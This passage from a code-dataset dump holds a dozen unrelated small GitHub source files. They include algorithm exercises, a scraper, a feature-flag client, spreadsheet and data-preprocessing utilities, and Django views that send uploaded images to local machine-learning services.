la tabla para hacer la suma del coeficiente binomial\n return calBinomial(n, k, dp)\n \n# Solicitamos al usuario el numero al que calcularemos el coeficiente\nn = int(input(\"Dame el valor del numero a calcular su coeficiente: \"))\n\n# Solicitamos al usuario el coeficiente para calcularle al numero\nk = int(input(\"Dame el valor del coeficiente: \"))\nprint(\"\\n\")\n\n# Inicializamos la variable para contar el tiempo de ejecucion\ntiempo_in = time()\n \n# Realizamos el calculo del coeficiente\nprint(\"Valor del coeficiente binomial de \"+str(n)+\"\\n\"+\"Con coeficiente \" +str(k)+\"\\n\"+\"Es: \",binomial(n, k))\nprint(\"\\n\")\n\n# Calculamos el tiempo que tarda en ejecutarse y lo imprimimos en pantalla\ntiempo_fin = time() - tiempo_in\nprint(\"Tiempo de ejecucion: %.10f segundos.\" %tiempo_fin)\n","repo_name":"danielDEBIAN/dynamic_algorithms","sub_path":"binomial.py","file_name":"binomial.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7195767205","text":"import asyncio\nimport logging\n\nfrom pyinjective.client import Client\nfrom pyinjective.constant import Network\n\nasync def main() -> None:\n network = Network.testnet()\n client = Client(network, insecure=False)\n market_ids = [\"0x4ca0f92fc28be0c9761326016b5a1a2177dd6375558365116b5bdda9abc229ce\", \"0x979731deaaf17d26b2e256ad18fecd0ac742b3746b9ea5382bac9bd0b5e58f74\"]\n subaccount_id = \"0xc6fe5d33615a1c52c08018c47e8bc53646a0e101000000000000000000000000\"\n # always use single market if provided\n # if neither of these params is provided, streams from all markets.\n positions = client.stream_derivative_positions(\n market_id=market_ids[0],\n # market_ids=market_ids,\n subaccount_id=subaccount_id\n )\n for position in positions:\n print(position)\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n asyncio.get_event_loop().run_until_complete(main())\n","repo_name":"anodaram/injective-sdk-python","sub_path":"examples/sync/exchange_client/derivative_exchange_rpc/9_StreamPositions.py","file_name":"9_StreamPositions.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13599013494","text":"class Solution(object):\n def removeNthFromEnd(self, head, 
n):\n c = 0\n noOfNodes = 0\n temp = head\n while temp != None:\n noOfNodes += 1\n temp = temp.next\n temp = head\n prev = None\n while temp != None:\n if prev != None and c == noOfNodes-n:\n prev.next = temp.next\n elif prev == None and c == noOfNodes-n:\n return head.next\n c += 1\n prev = temp\n temp = temp.next\n return head","repo_name":"abdulalikhan/LeetCode-Submissions","sub_path":"19-remove-nth-node-from-end-of-list/19-remove-nth-node-from-end-of-list.py","file_name":"19-remove-nth-node-from-end-of-list.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"27914937940","text":"# coding: UTF-8\nfrom bs4 import BeautifulSoup\nimport re\n\nfile_path=\"data/sample.html\"\nbase_url=\"http://www.netkeiba.com/\"\n\nhtml = open(file_path,\"r\")\nsoup = BeautifulSoup(html,\"html.parser\")\n\n# タグつきで同じものが2つ引っかかる\nraces = soup.find_all('a',href=re.compile(\"^/\\?pid=race\\&\"))\nlist_race=[]\nfor race in races:\n list_race.append(base_url + race.get('href'))\n # print(base_url + race.get('href'))\n\n# 重複を削除する(※divのclassでFilterできないか?)\nlist_uniq = list(set(list_race))\nfor url in list_uniq:\n print(url)\n\n\n# お試し\nprint(\"-----------------------\")\n# li = soup.select('div[class^=\"racename\"]')\nli = soup.select('div.racename')\nfor l in li:\n print(\" - - - - -\")\n # print(l)\n a = l.find_all('a',href=re.compile(\"^/\\?pid=race\\&\"))\n print(a)\n print(a[0].get('href'))\n for b in a:\n print(b.get('href'))\n\n# print([a.get(\"href\") for a in li.find_all(\"a\")])\n\nhtml.close()\n\n\n","repo_name":"calick/pythonSample","sub_path":"webスクレイピング/work/collectUrl.py","file_name":"collectUrl.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20731696525","text":"# 내 풀이\ndef solution(id_list, report, k):\n # 받을 이메일 개수\n answer = {id: 0 for id in id_list}\n # key = 신고 당함, value : 신고함\n r = {id: [] for id in id_list}\n\n # 리스트 내 중복되는 값 무시하기 위해서\n report = list(set(report))\n\n for i in range(len(report)):\n user, warn = report[i].split()\n r[warn].append(user)\n\n for item, value in r.items():\n if len(value) >= k:\n for key in value:\n answer[key] += 1\n\n return list(answer.values())\n\n# 다른 사람 풀이\ndef solution(id_list, report, k):\n answer = [0] * len(id_list)\n reports = {x : 0 for x in id_list}\n\n for r in set(report):\n reports[r.split()[1]] += 1\n\n for r in set(report):\n if reports[r.split()[1]] >= k:\n answer[id_list.index(r.split()[0])] += 1\n\n return answer","repo_name":"rkdtndk99/Algorithm","sub_path":"Python/Programmers/Lv.1/신고 결과 받기.py","file_name":"신고 결과 받기.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7841870114","text":"\"\"\"Top-level package for molasses.\"\"\"\n\n__author__ = \"\"\"James Hrisho\"\"\"\n__email__ = 'james.hrisho@gmail.com'\n__version__ = '0.1.2'\n\nimport logging\nimport requests\nfrom random import random\nimport zlib\nimport json\nimport sseclient\nimport math\nimport threading\nimport time\nimport semver\nfrom typing import Dict, Optional\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.triggers.interval import IntervalTrigger\nlogger = logging.getLogger(__name__)\n\nBASE_URL = 'https://sdk.molasses.app/v1'\n\n\nclass MolassesClient:\n \"\"\"\n docstring\n \"\"\"\n __cache = {}\n __initialized = False\n __polling = 
False\n __sseclient = None\n __retry_count = 0\n\n def __init__(self, api_key: str, auto_send_events=False, polling=False, base_url=BASE_URL):\n self.api_key = api_key\n self.auto_send_events = auto_send_events\n self.base_url = base_url\n self.scheduler = BackgroundScheduler()\n self.polling = polling\n logger.propagate = True\n logger.info(\"starting to connect\")\n if polling is True:\n self.__fetch_features()\n self.features_job = self.scheduler.add_job(self.__fetch_features,\n trigger=IntervalTrigger(seconds=int(15)))\n self.scheduler.start()\n else:\n thread = threading.Thread(\n target=self.__start_stream, args=())\n thread.daemon = True\n thread.start()\n\n def is_active(self, key: str, user: Optional[Dict] = None):\n if self.__initialized is not True:\n return False\n\n if key in self.__cache:\n feature = self.__cache[key]\n result = self.__is_active(feature, user)\n if user and \"id\" in user and self.auto_send_events:\n self.__send_events({\n \"event\": \"experiment_started\",\n \"tags\": user[\"params\"],\n \"userId\": user[\"id\"],\n \"featureId\": feature[\"id\"],\n \"featureName\": key,\n \"testType\": result if \"experiment\" else \"control\"\n })\n return result\n else:\n return False\n\n def experiment_started(self, key: str, user: Optional[Dict] = None, additional_details: Dict = {}):\n if self.__initialized is not True or user is None or \"id\" not in user:\n return False\n if key not in self.__cache:\n return False\n feature = self.__cache[key]\n\n result = self.__is_active(feature, user)\n self.__send_events({\n \"event\": \"experiment_started\",\n \"tags\": {**user[\"params\"], **additional_details},\n \"userId\": user[\"id\"],\n \"featureId\": feature[\"id\"],\n \"featureName\": key,\n \"testType\": result if \"experiment\" else \"control\"\n })\n\n def track(self, key: str, user: Optional[Dict] = None, additional_details: Dict = {}):\n tags = additional_details\n if user is None or \"id\" not in user:\n return False\n if \"params\" in user:\n tags = {**user[\"params\"], **additional_details}\n self.__send_events({\n \"event\": key,\n \"tags\": tags,\n \"userId\": user[\"id\"]\n })\n\n def experiment_success(self, key: str, user: Optional[Dict] = None, additional_details: Dict = {}):\n if self.__initialized is not True or user is None or \"id\" not in user:\n return False\n if key not in self.__cache:\n return False\n feature = self.__cache[key]\n result = self.__is_active(feature, user)\n self.__send_events({\n \"event\": \"experiment_success\",\n \"tags\": {**user[\"params\"], **additional_details},\n \"userId\": user[\"id\"],\n \"featureId\": feature[\"id\"],\n \"featureName\": key,\n \"testType\": result if \"experiment\" else \"control\"\n })\n\n def stop(self):\n if self.__polling is True:\n self.features_job.stop()\n self.scheduler.shutdown()\n else:\n self.__sseclient.close()\n\n def __is_active(self, feature, user=None):\n if feature[\"active\"] is not True:\n return False\n if user is None or \"id\" not in user:\n return True\n segment_map = {}\n for feature_segment in feature[\"segments\"]:\n segment_type = feature_segment[\"segmentType\"]\n segment_map[segment_type] = feature_segment\n if \"alwaysControl\" in segment_map and self.__is_user_in_segment(user, segment_map[\"alwaysControl\"]):\n return False\n if \"alwaysExperiment\" in segment_map and self.__is_user_in_segment(user, segment_map[\"alwaysExperiment\"]):\n return True\n if \"everyoneElse\" in segment_map:\n return self.__get_user_percentage(user[\"id\"], 
segment_map[\"everyoneElse\"][\"percentage\"])\n return False\n\n def __get_user_percentage(self, id=\"\", percentage=0):\n if percentage == 100:\n return True\n if percentage == 0:\n return False\n c = zlib.crc32(bytes(id, \"utf-8\")) & 0xffffffff\n v = abs(c % 100)\n return v < percentage\n\n def __is_user_in_segment(self, user: Optional[Dict], s: Dict):\n user_constraints = s[\"userConstraints\"]\n constraints_length = len(user_constraints)\n constraints_to_be_met = 1 if s[\"constraint\"] == \"any\" else constraints_length\n constraints_met = 0\n\n for i in range(constraints_length):\n constraint = user_constraints[i]\n param = constraint[\"userParam\"]\n param_exists = param in user[\"params\"]\n user_value = None\n if param_exists:\n user_value = user[\"params\"][param]\n if param == \"id\":\n param_exists = True\n user_value = user[\"id\"]\n if self.__meets_constraint(user_value, param_exists, constraint):\n constraints_met = constraints_met + 1\n return constraints_met >= constraints_to_be_met\n\n def __parse_number(self, user_value):\n if type(user_value) is (int, float, complex):\n return user_value\n elif type(user_value) is bool:\n return 1 if user_value else 0\n else:\n return float(user_value)\n\n def __parse_bool(self, user_value):\n if type(user_value) is (int, float, complex):\n return user_value == 1\n elif type(user_value) is bool:\n return user_value\n else:\n return user_value == \"true\"\n\n def __meets_constraint(self, user_value, param_exists, constraint):\n operator = constraint[\"operator\"]\n if param_exists is False:\n return False\n constraint_value = constraint[\"values\"]\n if \"userParamType\" in constraint and constraint[\"userParamType\"] == \"number\":\n user_value = self.__parse_number(user_value)\n constraint_value = self.__parse_number(constraint_value)\n elif \"userParamType\" in constraint and constraint[\"userParamType\"] == \"boolean\":\n user_value = self.__parse_bool(user_value)\n constraint_value = self.__parse_bool(constraint_value)\n elif \"userParamType\" in constraint and constraint[\"userParamType\"] == \"semver\":\n user_value = str(user_value)\n user_value = semver.Version.parse(user_value)\n constraint_value = semver.Version.parse(constraint_value)\n else:\n user_value = str(user_value)\n\n if operator == \"in\":\n list_values = constraint_value.split(\",\")\n return user_value in list_values\n elif operator == \"nin\":\n list_values = constraint_value.split(\",\")\n return user_value not in list_values\n elif operator == \"equals\":\n return user_value == constraint_value\n elif operator == \"doesNotEqual\":\n return user_value != constraint_value\n elif operator == \"gt\":\n return user_value > constraint_value\n elif operator == \"gte\":\n return user_value >= constraint_value\n elif operator == \"lt\":\n return user_value < constraint_value\n elif operator == \"lte\":\n return user_value <= constraint_value\n elif operator == \"contains\":\n return user_value in constraint_value\n elif operator == \"doesNotContain\":\n return user_value not in constraint_value\n else:\n return False\n\n def __send_events(self, event_options: Dict):\n event_options[\"tags\"] = json.dumps(event_options[\"tags\"])\n requests.post(self.base_url + \"/analytics\", json=event_options, headers={\n \"Authorization\": \"Bearer \" + self.api_key\n })\n\n def __schedule_reconnect(self):\n scheduled_time = 1 * self.__retry_count * 2\n if scheduled_time == 0:\n scheduled_time = 1\n elif scheduled_time >= 64:\n scheduled_time = 64\n scheduled_time = scheduled_time - 
\\\n math.trunc(random() * 0.3 * scheduled_time)\n self.__retry_count = self.__retry_count + 1\n logger.info(\n \"Scheduling reconnect to Molasses in {scheduled_time} Seconds\".format(scheduled_time=scheduled_time))\n time.sleep(scheduled_time)\n self.__start_stream()\n\n def __start_stream(self):\n try:\n response = requests.get(self.base_url + \"/event-stream\", params={}, stream=True, headers={\n \"Authorization\": \"Bearer \" + self.api_key\n })\n response.raise_for_status()\n client = sseclient.SSEClient(response)\n for event in client.events():\n data = json.loads(event.data)\n if \"data\" in data:\n d = data.get(\"data\")\n if \"features\" in d:\n features = d.get(\"features\")\n for feature in features:\n self.__cache[feature[\"key\"]] = feature\n self.__initialized = True\n logger.info(\"Initiated and connected\")\n except requests.ConnectionError:\n logger.error(\"Failed to connect with Molasses\")\n self.__schedule_reconnect()\n except Exception:\n logger.error(\"Connection lost with Molasses\")\n self.__schedule_reconnect()\n\n def __fetch_features(self):\n response = requests.get(self.base_url + \"/features\", params={}, headers={\n \"Authorization\": \"Bearer \" + self.api_key\n })\n if response.status_code == 200:\n data = response.json()\n if \"data\" in data:\n d = data.get(\"data\")\n if \"features\" in d:\n features = d.get(\"features\")\n for feature in features:\n self.__cache[feature[\"key\"]] = feature\n self.__initialized = True\n else:\n logger.error(\"Molasses - %s %s\",\n response.status_code, response.text, exc_info=1)\n","repo_name":"molassesapp/molasses_python","sub_path":"molasses/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22718272198","text":"from xlsxwriter.workbook import Workbook\nfrom collections import OrderedDict\nimport common\nimport datetime\n\n\nclass XlsFactory:\n\n @staticmethod\n def create(input):\n filename = common.pop_dict(input, \"filename\")\n workbook = Workbook(filename)\n formats = InputFactory.init_formats(input, workbook)\n for sheet in input['sheets']:\n XlsFactory.process_sheet(workbook, sheet, formats)\n workbook.close()\n return filename\n\n @staticmethod\n def process_sheet(workbook, sheet, formats):\n for sheet_name, sheet_data in sheet.items():\n sorted_dict = OrderedDict(\n sorted(sheet_data.items(), key=lambda t: t[0])\n )\n worksheet = workbook.add_worksheet(sheet_name)\n XlsFactory.add_cells(worksheet, sorted_dict, formats)\n\n @staticmethod\n def add_cells(sheet, sorted_dict, formats):\n conditional_formats = common.pop_dict(sorted_dict, \"conditional_formats\")\n column_sizes = common.pop_dict(sorted_dict, \"column_size\")\n\n for cell_pos, cell_value in sorted_dict.items():\n new_value = InputFactory.get_args(cell_value, formats)\n new_key = InputFactory.parse_cell_position(cell_pos)\n args = new_key + new_value\n if isinstance(args[0], str) and \":\" in args[0]:\n sheet.merge_range(*args)\n else:\n sheet.write(*args)\n\n XlsFactory.add_conditional_formats(conditional_formats, formats, sheet)\n XlsFactory.resize_columns(column_sizes, sheet)\n\n\n @staticmethod\n def add_conditional_formats(conditional_formats, formats, worksheet):\n for cells, criteria in conditional_formats.items():\n criteria[\"format\"] = formats.get(criteria.get(\"format\"))\n worksheet.conditional_format(cells, criteria)\n\n @staticmethod\n def resize_columns(column_sizes, worksheet):\n for k, v in 
column_sizes.items():\n worksheet.set_column(k, v)\n\n\nclass InputFactory:\n @staticmethod\n def init_formats(input, workbook):\n return_dict = {}\n for k, v in common.pop_dict(input, \"formats\").items():\n return_dict[k] = workbook.add_format(v)\n return return_dict\n\n @staticmethod\n def get_args(value, formats):\n def is_dict():\n key = \"value\" if \"value\" in value else \"date\"\n if \"date\" == key:\n nums = [int(n) for n in value[key].split(\"-\")]\n date = datetime.date(nums[0], nums[1], nums[2])\n return date, formats[value['format']]\n else:\n return value['value'], formats[value['format']]\n\n def is_str():\n return (value,)\n\n functions = {dict: is_dict, str: is_str}\n return functions[value.__class__]()\n\n @staticmethod\n def parse_cell_position(k):\n if \",\" in k:\n return tuple(int(n) for n in k.split(\",\"))\n else:\n return (k,)","repo_name":"dxe4/jsonTOxls","sub_path":"xls_process.py","file_name":"xls_process.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"43"} +{"seq_id":"35432675643","text":"import sys\n\nimport operations\nimport storage\nimport ui\n\n\ndef choose_options_menu():\n user_choice = input('Your choice: ')\n if user_choice == 'd':\n operations.detect_broken_record(storage.open_wav_files_from())\n elif user_choice == 'g':\n operations.save_waveforms_from(storage.open_wav_files_from())\n elif user_choice == 'q':\n sys.exit()\n else:\n ui.display_message(\"There isn't such option\")\n\n\ndef display_menu():\n menu_commands = ['detect broken records',\n 'generate waveform png',\n 'quit']\n ui.display_program_menu(menu_commands)\n\n\ndef main():\n while True:\n display_menu()\n choose_options_menu()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"2RMalinowski/audio_analysis","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36858623038","text":"nfile = open('data/day02.txt', 'r')\nnbl = nfile.read().split('\\n')\n\nvalid = 0\nfor line in nbl:\n\ttab = line.split(':')\n\t(nb, letter) = tab[0].split(' ')\n\t(mina, maxa) = nb.split('-')\n\ttext = tab[1].replace(' ', '')\n\tvalidate = False\n\tif(text[int(mina) - 1] == letter):\n\t\tvalidate = True\n\tif(text[int(maxa) - 1] == letter):\n\t\tif validate:\n\t\t\tvalidate = False\n\t\telse:\n\t\t\tvalidate = True\n\tif validate:\n\t\tvalid +=1\nprint(valid)","repo_name":"AFeuillet/CodingGames","sub_path":"AOC/2020/day02b.py","file_name":"day02b.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34300129191","text":"név= input('Mi az ős neve? ')\nbogyók=int(input('Hány Bogyója van? 
'))\nif bogyók<10:\n minősités=\"zsenge\"\nelif bogyók>20:\n minősités=\"nagy koponya\"\nelse:\n minősités='gyűjtögető'\n\nprint(f'{név} egy {minősités}.')\n","repo_name":"Tucsok2/Python","sub_path":"bogyó.py","file_name":"bogyó.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"42925224139","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nfrom sklearn.preprocessing import OneHotEncoder, OrdinalEncoder, StandardScaler, MinMaxScaler\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.decomposition import PCA\r\nfrom yellowbrick.cluster import KElbowVisualizer\r\nfrom yellowbrick.cluster import SilhouetteVisualizer\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.cluster import DBSCAN\r\nfrom sklearn.mixture import GaussianMixture\r\nimport scipy.cluster.hierarchy as shc\r\nimport time\r\n#from kmodes.kprototypes import KPrototypes\r\n\r\n# Load data\r\ndf = pd.read_csv('heartdatak.csv',sep=',')\r\nprint(df.head())\r\n\r\n#check values in each column to know missing values\r\nfor column in df:\r\n print(\"unique values in\\\"\",column,\"\\\"are:\")\r\n print(df[column].value_counts())\r\n\r\n#drop thal, slope, ca as they have majow missing values\r\n#drop class as it is irrelevant for clustering\r\n\r\ndf.drop(columns=['class','ca', 'thal', 'slope'],inplace=True)\r\n\r\n\r\n#replace ? with NaN\r\ndf.fbs = pd.to_numeric(df.fbs, errors='coerce')\r\ndf.oldpeak = pd.to_numeric(df.oldpeak, errors='coerce')\r\ndf.exang = pd.to_numeric(df.exang, errors='coerce')\r\ndf.thalach = pd.to_numeric(df.thalach, errors='coerce')\r\ndf.chol = pd.to_numeric(df.chol, errors='coerce')\r\ndf.trestbps = pd.to_numeric(df.trestbps, errors='coerce')\r\ndf.restecg = pd.to_numeric(df.restecg, errors='coerce')\r\n\r\n#fill missing values with mean\r\ndf.fbs.fillna(df.fbs.mean(), inplace=True)\r\ndf.oldpeak.fillna(df.oldpeak.mean(), inplace=True)\r\ndf.exang.fillna(df.exang.mean(), inplace=True)\r\ndf.thalach.fillna(df.thalach.mean(), inplace=True)\r\ndf.chol.fillna(df.chol.mean(), inplace=True)\r\ndf.trestbps.fillna(df.trestbps.mean(), inplace=True)\r\ndf.restecg.fillna(df.restecg.mean(), inplace=True)\r\n\r\n\r\n#convert datatype to integer\r\ndf['fbs'] = df['fbs'].astype('int')\r\ndf['trestbps'] = df['trestbps'].astype('int')\r\ndf['oldpeak'] = df['oldpeak'].astype('int')\r\ndf['exang'] = df['exang'].astype('int')\r\ndf['thalach'] = df['thalach'].astype('int')\r\ndf['chol'] = df['chol'].astype('int')\r\ndf['restecg'] = df['restecg'].astype('int')\r\n\r\nfor column in df:\r\n print(\"unique values in\\\"\",column,\"\\\"are:\")\r\n print(df[column].value_counts())\r\n \r\n#EDA\r\ndf.describe(include='all') \r\ndf.isna().sum()\r\ndf.info()\r\n\r\n#Correlation\r\nprint(df.corr())\r\nplt.matshow(df.corr())\r\nplt.show()\r\n\r\n#drawing boxplot to detect outliers\r\nsns.boxplot(x=\"variable\", y=\"value\", data=pd.melt(df))\r\nplt.title('BoxPlot of Data Columns')\r\nplt.show()\r\n\r\nfig, axes = plt.subplots(ncols=len(df.columns), figsize=(30,15))\r\nfor ax, col in zip(axes, df.columns):\r\n sns.distplot(df[col], ax=ax)\r\n plt.tight_layout() \r\nplt.show()\r\n\r\n#convert categorical variabled with one hot encoding\r\nprint(df.keys())\r\ndf = pd.get_dummies(df, columns=[\"gender\",\"cp\",\"fbs\",\"restecg\",\"exang\"])\r\nprint(\"converted categorical 
data:\\n\",df)\r\nprint(df.keys())\r\n\r\n#scale numerical data\r\n# Using DataFrame.filter() method.\r\ndf_continuous = df.filter(['age', 'trestbps', 'chol','thalach', 'oldpeak'], axis=1)\r\n\r\nscale_df=MinMaxScaler().fit_transform(df_continuous)\r\nprint(\"scaled data \\n:\",scale_df)\r\ndf.drop(columns=['age', 'trestbps', 'chol','thalach', 'oldpeak'],inplace=True)\r\nprint(\"Dataframe: \\n\",df)\r\npreprocessed_df = pd.DataFrame(scale_df,columns= df_continuous.columns )\r\npreprocessed_df = pd.concat([preprocessed_df,df],axis=1)\r\nprint(\"Preprocessed Data: \\n\",preprocessed_df)\r\npreprocessed_df.isna().sum()\r\n# preprocessed_df = preprocessed_df.fillna(0)\r\nprint(df.keys())\r\n\r\n\r\n#drop irrelevant columns\r\npreprocessed_df.drop(columns=[ 'gender_0', 'gender_1'],inplace=True)\r\nprint(\"Data ready for clustering:\\n\",preprocessed_df)\r\nprint(preprocessed_df.keys())\r\npreprocessed_df.to_csv(\"Preprocessed_Data.csv\")\r\n","repo_name":"SystemHeuristics/Clustering","sub_path":"Data_preprocessing.py","file_name":"Data_preprocessing.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12863145279","text":"import base64\nimport mimetypes\nimport os\nfrom datetime import datetime\nimport base64\nimport io\nimport PIL.Image as Image\nimport requests\nfrom django.contrib import messages\nfrom django.core.files.storage import FileSystemStorage\nfrom django.http.response import StreamingHttpResponse\nfrom django.shortcuts import render, redirect\n\nfrom .camera import VideoCamera\nfrom .forms import TourismForm\nfrom .ml_model import logic_layer\nfrom .models import History, NumberPlateHistory\n\n# Create your views here.\nres = None\n\n\ndef index(request):\n return render(request=request,\n template_name='main/index1.html')\n\n\ndef predict(request):\n return render(request=request,\n template_name='main/predict.html', context={\"tourist\": res})\n\n\ndef photo_coloring(request):\n try:\n his_prods = []\n for i in History.objects.all():\n his_prods.append(i)\n if len(his_prods) > 14:\n ten = his_prods[-15:]\n return render(request=request, template_name='main/photo_coloring.html',\n context={'his_prod': ten})\n return render(request=request, template_name='main/photo_coloring.html',\n context={'his_prod': his_prods})\n except:\n messages.info(request, \"Recent Post Not Found\")\n return render(request=request, template_name='main/photo_coloring.html')\n\n\ndef detail(request, his_id):\n try:\n product = History.objects.filter(his_id=his_id).first()\n his_prods = []\n for i in History.objects.all():\n his_prods.append(i)\n if len(his_prods) > 9:\n ten = his_prods[-10:]\n context = {'product': product, 'his_prod': ten}\n\n return render(request, \"main/detail.html\", context)\n context = {'product': product, 'his_prod': his_prods}\n return render(request, \"main/detail.html\", context)\n\n except:\n messages.info(request, \"Details Page data not found\")\n context = {'product': product, 'his_prod': his_prods}\n return render(request, \"main/detail.html\", context)\n\n\ndef upload(request):\n try:\n if request.method == 'POST':\n myfile = request.FILES.get(\"myfile\")\n mimetypes.init()\n\n mimestart = mimetypes.guess_type(myfile.name)[0]\n\n if mimestart != None:\n mimestart = mimestart.split('/')[0]\n\n if mimestart in ['video', 'image']:\n timestr = datetime.today().isoformat()\n fs = FileSystemStorage(location='media/image_as_input/' + timestr)\n filename = fs.save(myfile.name, 
myfile)\n # uploaded_file_url = fs.url(filename)\n\n file_input = os.path.join(\"media/image_as_input/\" + timestr, filename)\n # file_output = os.path.join(\"media/image_as_output/\", filename)\n\n url = 'http://192.168.75.13:5001/process'\n files = {'file': open(file_input, 'rb')}\n\n try:\n Picture_request = requests.post(url, files=files)\n if Picture_request.status_code == 200:\n # Picture_request = requests.post(url, files=files)\n import base64\n file = open(\"media/image_as_output/\" + timestr + filename, \"wb\")\n file.write(Picture_request.content)\n file.close()\n file_loc1 = \"media/image_as_output/\" + timestr + filename\n\n history = History.objects.create(name=filename, image_input=file_input,\n image_output=file_loc1)\n history.save()\n with open(file_loc1, \"rb\") as img_file:\n image_data = base64.b64encode(img_file.read()).decode('utf-8')\n uploaded_file = dict()\n uploaded_file[\"image\"] = image_data\n uploaded_file = uploaded_file[\"image\"]\n\n return render(request=request, template_name='main/upload.html',\n context={'uploaded_file': uploaded_file\n })\n else:\n messages.info(request, \"API is not Connected\")\n return render(request=request,\n template_name='main/upload.html')\n except:\n messages.info(request, \"API is not Connected\")\n return render(request=request,\n template_name='main/upload.html')\n else:\n messages.info(request, \"please upload video and image data\")\n return render(request=request, template_name='main/upload.html',\n )\n else:\n messages.info(request, \"Invalid data\")\n return render(request=request, template_name='main/upload.html',\n )\n\n else:\n return render(request=request,\n template_name='main/upload.html')\n except:\n messages.info(request, \" Please Check upload data \")\n return render(request=request,\n template_name='main/upload.html')\n\n\ndef number_plate(request):\n try:\n num_his_prods = []\n for i in NumberPlateHistory.objects.all():\n num_his_prods.append(i)\n return render(request=request, template_name='main/number_plate.html',\n context={'num_his_prods': num_his_prods})\n\n except:\n messages.info(request, \"Recent Post data is not found\")\n\n\ndef detail_for_number_plate(request, his_id):\n try:\n product_for_number_plate = NumberPlateHistory.objects.filter(num_his_id=his_id).first()\n number_his_prods = []\n for i in NumberPlateHistory.objects.all():\n number_his_prods.append(i)\n if len(number_his_prods) > 9:\n ten = number_his_prods[-10:]\n context = {'product_for_number_plate': product_for_number_plate, 'number_his_prods': ten}\n return render(request, \"main/detail_for_number_plate.html\", context)\n context = {'product_for_number_plate': product_for_number_plate, 'number_his_prods': number_his_prods}\n return render(request, \"main/detail_for_number_plate.html\", context)\n except:\n messages.info(request, \"number detail page not found\")\n return render(request, \"main/detail_for_number_plate\")\n\n\ndef upload_number_plate(request):\n try:\n if request.method == 'POST':\n myfile = request.FILES.get(\"myfile\")\n mimetypes.init()\n mimestart = mimetypes.guess_type(myfile.name)[0]\n if mimestart != None:\n mimestart = mimestart.split('/')[0]\n\n if mimestart in ['video', 'image']:\n timestr = datetime.today().isoformat()\n fs = FileSystemStorage(location='media/image_input_number_plate/' + timestr)\n filename = fs.save(myfile.name, myfile)\n # uploaded_file_url = fs.url(filename)\n\n file_input = os.path.join(\"media/image_input_number_plate/\" + timestr, filename)\n # file_output = os.pa`````````````````` 
h7th.join(\"media/image_as_output/\", filename)\n\n url = 'http://192.168.75.13:5005/process'\n files = {'file': open(file_input, 'rb')}\n try:\n Picture_request = requests.post(url, files=files)\n if Picture_request.status_code == 200:\n output_data = Picture_request.json()\n number_plat = output_data[\"Number_plat\"]\n image_bytes = output_data[\"ImageBytes\"]\n number_plat1 = \"\".join(number_plat)\n import base64\n file = open(\"media/image_output_number_plate/\" + timestr + filename, \"wb\")\n b = base64.b64decode(image_bytes)\n img = Image.open(io.BytesIO(b))\n\n\n # file.write(image_bytes)\n # file.close()\n file_loc1 = \"media/image_output_number_plate/\" + timestr + filename\n img.save(file_loc1)\n\n number_plate = NumberPlateHistory.objects.create(num_name=filename,\n num_image_input=file_input,\n num_image_output=file_loc1)\n number_plate.save()\n with open(file_loc1, \"rb\") as img_file:\n image_data = base64.b64encode(img_file.read()).decode('utf-8')\n uploaded_file = dict()\n uploaded_file[\"image\"] = image_data\n uploaded_file = uploaded_file[\"image\"]\n\n return render(request=request, template_name='main/upload_number_plate.html',\n context={'uploaded_file': uploaded_file, 'number_plat': number_plat1})\n else:\n messages.info(request, \"API Response Not valid\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n\n except:\n messages.info(request, \"API is Not Connected\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n else:\n messages.info(request, \"Please Upload Image and Video Data\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n\n else:\n messages.info(request, \"Invalid data\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n else:\n messages.info(request, 'Number Plate Recognition started')\n return render(request=request,\n template_name='main/upload_number_plate.html')\n except:\n messages.info(request, \"Please Check Upload data\")\n return render(request=request,\n template_name='main/upload_number_plate.html')\n\n\ndef gen(camera):\n while True:\n frame = camera.get_frame1()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n')\n\n\ndef emotion_based_music(request):\n # his_prods = []\n # for i in History.objects.all():\n # his_prods.append(i)\n # if len(his_prods) > 9:\n # ten = his_prods[-10:]\n # return render(request=request, template_name='main/emotion_based_music.html',\n # context={'his_prod': ten})\n return render(request=request, template_name='main/emotion_based_music.html')\n\n\ndef upload_image_for_music(request):\n try:\n if request.method == 'POST':\n myfile = 